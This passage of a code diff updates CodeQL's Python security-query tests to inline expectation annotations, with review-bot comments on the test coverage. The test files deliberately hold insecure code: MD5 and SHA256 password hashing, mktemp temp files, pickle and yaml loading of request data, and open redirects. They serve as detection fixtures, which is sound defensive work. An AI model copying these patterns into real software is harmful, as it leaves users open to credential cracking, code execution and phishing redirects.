| test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | +| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | +| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. 
| test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | Sensitive data (password) | edges | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:2:23:2:34 | ControlFlowNode for get_password | provenance | | | test_cryptodome.py:2:23:2:34 | ControlFlowNode for get_password | test_cryptodome.py:13:17:13:28 | ControlFlowNode for get_password | provenance | | 
@@ -61,16 +74,3 @@ nodes | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | semmle.label | ControlFlowNode for get_password() | | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | semmle.label | ControlFlowNode for dangerous | subpaths -#select -| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | -| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | -| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. 
| test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | -| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. 
| test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | -| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | Sensitive data (password) | 
diff --git a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.qlref b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.qlref index 6c8eeda7222b..495cb9c979c3 100644 --- a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.qlref +++ b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.qlref @@ -1 +1,2 @@ -Security/CWE-327/WeakSensitiveDataHashing.ql +query: Security/CWE-327/WeakSensitiveDataHashing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptodome.py b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptodome.py index 3e196196ef9b..c8a6031b07d9 100644 --- a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptodome.py +++ b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptodome.py 
@@ -1,25 +1,25 @@ from Cryptodome.Hash import MD5, SHA256 -from my_module import get_password, get_certificate +from my_module import get_password, get_certificate # $ Source def get_badly_hashed_certificate(): - dangerous = get_certificate() + dangerous = get_certificate() # $ Source hasher = MD5.new() - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert return hasher.hexdigest() def get_badly_hashed_password(): - dangerous = get_password() + dangerous = get_password() # $ Source hasher = MD5.new() - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert return hasher.hexdigest() def get_badly_hashed_password2(): - dangerous = get_password() + dangerous = get_password() # $ Source # Although SHA-256 is a strong cryptographic hash functions, # it is not suitable for password hashing. hasher = SHA256.new() - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert return hasher.hexdigest() diff --git a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptography.py b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptography.py index 1090fda959c8..f65587fe9869 100644 --- a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptography.py +++ b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptography.py 
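Review bot: The single `# $ Source` on `from my_module import get_password, get_certificate` stands for two different sources, and each call site (`get_certificate()`, `get_password()`) carries its own `# $ Source` as well. As a result every `# $ Alert` in this file corresponds to two rows in WeakSensitiveDataHashing.expected, one from the ImportMember node and one from the call, and nothing in the test says this double reporting is intended. I would record it in a comment, e.g. `# Both the imported name and the call result are modelled as sensitive-data sources, so each sink is reported twice.`, placed at the end of the file so the annotated locations do not move. test_cryptography.py has the same pattern.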
@@ -1,29 +1,29 @@ from cryptography.hazmat.primitives import hashes from binascii import hexlify -from my_module import get_password, get_certificate +from my_module import get_password, get_certificate # $ Source def get_badly_hashed_certificate(): - dangerous = get_certificate() + dangerous = get_certificate() # $ Source hasher = hashes.Hash(hashes.MD5()) - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert digest = hasher.finalize() return hexlify(digest).decode("utf-8") def get_badly_hashed_password(): - dangerous = get_password() + dangerous = get_password() # $ Source hasher = hashes.Hash(hashes.MD5()) - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert digest = hasher.finalize() return hexlify(digest).decode("utf-8") def get_badly_hashed_password2(): - dangerous = get_password() + dangerous = get_password() # $ Source # Although SHA-256 is a strong cryptographic hash functions, # it is not suitable for password hashing. hasher = hashes.Hash(hashes.SHA256()) - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert digest = hasher.finalize() return hexlify(digest).decode("utf-8") diff --git a/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.py b/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.py index 3c68affed8c4..5b7e820706e5 100644 --- a/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.py +++ b/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.py 
@@ -2,19 +2,19 @@ import os def write_results1(results): - filename = mktemp() + filename = mktemp() # $ Alert with open(filename, "w+") as f: f.write(results) print("Results written to", filename) def write_results2(results): - filename = os.tempnam() + filename = os.tempnam() # $ Alert with open(filename, "w+") as f: f.write(results) print("Results written to", filename) def write_results3(results): - filename = os.tmpnam() + filename = os.tmpnam() # $ Alert with open(filename, "w+") as f: f.write(results) print("Results written to", filename) diff --git a/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.qlref b/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.qlref index 68a27dfb2690..c64f78a01039 100644 --- a/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.qlref +++ b/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.qlref @@ -1 +1,2 @@ -Security/CWE-377/InsecureTemporaryFile.ql +query: Security/CWE-377/InsecureTemporaryFile.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected index bab1e34c912b..309ef858d3b4 100644 --- a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected +++ b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected 
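Review bot: All three annotated functions in InsecureTemporaryFile.py are positive cases (`mktemp()`, `os.tempnam()`, `os.tmpnam()`), and the hunk shows no unannotated safe counterpart, so the inline expectations do not pin that the secure temp-file APIs stay silent. The file may continue past the hunk, in which case this does not apply. Otherwise a short negative case appended at the end of the file would cover it without moving the existing locations: a `write_results_ok(results)` function whose body is `with NamedTemporaryFile("w+", delete=False) as f:` followed by `f.write(results)`, with `NamedTemporaryFile` added to the file's existing `tempfile` import.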
@@ -1,3 +1,9 @@ +#select +| unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. 
| unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | edges | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for request | provenance | | | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for request | unsafe_deserialization.py:14:15:14:21 | ControlFlowNode for request | provenance | | 
@@ -22,9 +28,3 @@ nodes | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | semmle.label | ControlFlowNode for payload | | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | semmle.label | ControlFlowNode for payload | subpaths -#select -| unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. 
| unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.qlref b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.qlref index fa9c0ceb3cb8..2eba44efb96b 100644 --- a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.qlref +++ b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.qlref @@ -1 +1,2 @@ -Security/CWE-502/UnsafeDeserialization.ql +query: Security/CWE-502/UnsafeDeserialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/unsafe_deserialization.py b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/unsafe_deserialization.py index d9189a92f41c..bd73ec018b19 100644 --- a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/unsafe_deserialization.py +++ b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/unsafe_deserialization.py @@ -5,20 +5,20 @@ from yaml import SafeLoader -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @app.route("/") def hello(): payload = request.args.get("payload") - pickle.loads(payload) # NOT OK - yaml.load(payload) # NOT OK + pickle.loads(payload) # NOT OK # $ Alert + yaml.load(payload) # NOT OK # $ Alert yaml.load(payload, Loader=SafeLoader) # OK - marshal.loads(payload) # NOT OK + marshal.loads(payload) # NOT OK # $ Alert import dill - dill.loads(payload) # NOT OK + dill.loads(payload) # NOT OK # $ Alert import pandas - pandas.read_pickle(payload) # NOT OK \ No newline at end of file + pandas.read_pickle(payload) # NOT OK # $ Alert \ No newline at end of file 
diff --git a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected index 551299a64dc4..3e43c112e2a3 100644 --- a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected +++ b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected 
@@ -1,3 +1,16 @@ +#select +| test.py:8:21:8:26 | ControlFlowNode for target | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:8:21:8:26 | ControlFlowNode for target | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:32:21:32:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:32:21:32:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:39:21:39:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:39:21:39:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:46:21:46:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:46:21:46:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:62:21:62:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:62:21:62:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:69:21:69:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:69:21:69:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:76:21:76:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:76:21:76:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. 
| test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:83:21:83:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:83:21:83:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:93:18:93:26 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:93:18:93:26 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:114:25:114:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:114:25:114:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:140:25:140:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:140:25:140:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:148:25:148:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:148:25:148:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:1:26:1:32 | ControlFlowNode for request | provenance | | | test.py:1:26:1:32 | ControlFlowNode for request | test.py:7:14:7:20 | ControlFlowNode for request | provenance | | 
@@ -138,16 +151,3 @@ nodes | test.py:145:17:145:46 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:148:25:148:33 | ControlFlowNode for untrusted | semmle.label | ControlFlowNode for untrusted | subpaths -#select -| test.py:8:21:8:26 | ControlFlowNode for target | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:8:21:8:26 | ControlFlowNode for target | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:32:21:32:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:32:21:32:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:39:21:39:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:39:21:39:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:46:21:46:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:46:21:46:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:62:21:62:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:62:21:62:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:69:21:69:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:69:21:69:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. 
| test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:76:21:76:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:76:21:76:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:83:21:83:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:83:21:83:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:93:18:93:26 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:93:18:93:26 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:114:25:114:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:114:25:114:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:140:25:140:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:140:25:140:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:148:25:148:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:148:25:148:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | 
diff --git a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.qlref b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.qlref index 8b63d80f0db2..863d71f68b18 100644 --- a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.qlref +++ b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.qlref @@ -1,2 +1,2 @@ -Security/CWE-601/UrlRedirect.ql - +query: Security/CWE-601/UrlRedirect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/test.py b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/test.py index 538e4d3910ba..c474380c5907 100644 --- a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/test.py +++ b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/test.py @@ -1,11 +1,11 @@ -from flask import Flask, request, redirect +from flask import Flask, request, redirect # $ Source app = Flask(__name__) @app.route('/') def hello(): target = request.args.get('target', '') - return redirect(target, code=302) + return redirect(target, code=302) # $ Alert # Check for safe prefixes @@ -29,21 +29,21 @@ def ok2(): def ok3(): untrusted = request.args.get('target', '') safe = "https://safe.com/{}".format(untrusted) - return redirect(safe, code=302) # FP + return redirect(safe, code=302) # FP # $ Alert @app.route('/ok4') def ok4(): untrusted = request.args.get('target', '') safe = f"https://safe.com/{untrusted}" - return redirect(safe, code=302) # FP + return redirect(safe, code=302) # FP # $ Alert @app.route('/ok5') def ok5(): untrusted = request.args.get('target', '') safe = "https://safe.com/%s" % untrusted - return redirect(safe, code=302) # FP + return redirect(safe, code=302) # FP # $ Alert @app.route('/const-str-compare') 
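Review bot: In `ok3`, `ok4` and `ok5` the redirects that the existing comments label `# FP` are now annotated with a plain `# $ Alert`, which records a known false positive as if it were a wanted result. The inline-expectations format has a dedicated marker for this, so these three lines would be better written as `return redirect(safe, code=302)  # $ SPURIOUS: Alert`. That keeps the test passing with the current query, and the expectation should be flagged for update once the query stops reporting redirects pinned to the fixed `https://safe.com/` prefix. It also lets a reader tell the intended detections in `hello` and `not_ok1`–`not_ok4` apart from the accepted noise. The decorator of `ok3` lies above this hunk.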
